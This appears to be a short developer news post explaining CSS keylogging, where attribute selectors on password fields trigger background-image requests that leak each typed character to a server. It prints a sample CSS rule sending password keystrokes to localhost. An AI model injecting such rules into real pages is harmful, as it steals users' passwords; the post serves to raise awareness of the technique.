Security Icon

CSS key logging is a thing?! 😱

logged by @jerodsanto 2018-02-23T14:09:00.007925Z permalink #security #css

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here's how it works:

Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

Add some CSS that looks like this:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");

When the user types an a in to the password field, it will hit your server for logging. Dastardly!

0:00 / 0:00